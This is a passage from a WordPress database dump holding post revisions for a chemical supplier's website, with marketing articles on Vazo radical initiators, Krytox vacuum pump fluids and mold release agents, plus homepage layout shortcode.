half-life at 88 degrees Celsius and so on.  For ease in our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated with the Vazo name indicates its 10hr half-life.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and as like diazo-compound will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however there many chemical and safety drawbacks, in comparison to Vazo FRS makes them less sought after. Peroxides are extremely shock sensitive and can detonate on impact, they can induce free radical polymerization, and are extremely temperature sensitive.  In comparison to the equivalent Vazo (based on similar half-lives) initiator, Vazo does exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, and lower control on monomer distribution versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, Vazo initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover Vazo variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-13 16:52:36', '2016-09-13 16:52:36', '', 1601, 'https://132.148.10.86/wordpress/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1608, 2, '2016-10-05 12:41:44', '2016-10-05 12:41:44', 'Krytox VPF, vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox™ fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox™ superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide\nlow vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\n\nWhile Krytox VPF fluids are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox™ XP products have not been tested with all materials. Initial testing has shown no problems with Teflon™ fluoroplastic resin, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. The performance of the soluble additives could degrade at temperatures more than 182 °C (360 °F) over a long period of time.\n\nHigh Vacuum Grease', 'VPF 1506', 'Krytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems.\n<br /><br />\nViscosity varies per grade. 1506 is the least viscous.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '943-autosave-v1', '', '', '2016-10-05 12:41:44', '2016-10-05 12:41:44', '', 943, 'https://132.148.10.86/wordpress/943-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1609, 3, '2016-09-13 16:59:09', '2016-09-13 16:59:09', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of  mold release agents are available and which variant would compliment their production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower for the sacrifiscal and PVS release agents, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding constant,efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-13 16:59:09', '2016-09-13 16:59:09', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1613, 3, '2016-09-13 17:21:40', '2016-09-13 17:21:40', '<img class="alignnone wp-image-1606" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/VAZO-FRS-article-800x533.jpg" alt="vazo-frs-article" width="732" height="488" />\r\n\r\nVazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each Vazo analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo FRS. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, and lower control on monomer distribution versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, Vazo initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover Vazo variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-13 17:21:40', '2016-09-13 17:21:40', '', 1601, 'https://132.148.10.86/wordpress/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1614, 2, '2016-09-13 17:23:57', '2016-09-13 17:23:57', '', 'tribosys-test', '', 'inherit', 'open', 'closed', '', 'tribosys-test', '', '', '2016-09-13 17:23:57', '2016-09-13 17:23:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1615, 2, '2016-09-13 17:25:12', '2016-09-13 17:25:12', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\n[divider]\n\n<h1>ReleaSys<strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1610" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1611"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1578"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 17:25:12', '2016-09-13 17:25:12', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1616, 3, '2016-09-13 17:29:55', '2016-09-13 17:29:55', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release systems are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-13 17:29:55', '2016-09-13 17:29:55', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1617, 2, '2016-09-13 17:54:17', '2016-09-13 17:54:17', '', 'shieldsys', '', 'inherit', 'open', 'closed', '', 'shieldsys-3', '', '', '2016-09-13 17:54:17', '2016-09-13 17:54:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/shieldsys-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1618, 2, '2016-09-13 17:54:22', '2016-09-13 17:54:22', '', 'solvsys', '', 'inherit', 'open', 'closed', '', 'solvsys-3', '', '', '2016-09-13 17:54:22', '2016-09-13 17:54:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/solvsys-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1619, 2, '2016-09-13 17:59:04', '2016-09-13 17:59:04', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<h2>SINCE 1955</h2>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\r\n[divider]\r\n\r\n<h1>ReleaSys<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 17:59:04', '2016-09-13 17:59:04', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1620, 2, '2016-09-13 18:00:49', '2016-09-13 18:00:49', '', 'krytox-logo', '', 'inherit', 'open', 'closed', '', 'krytox-logo-2', '', '', '2016-09-13 18:00:49', '2016-09-13 18:00:49', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-logo-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
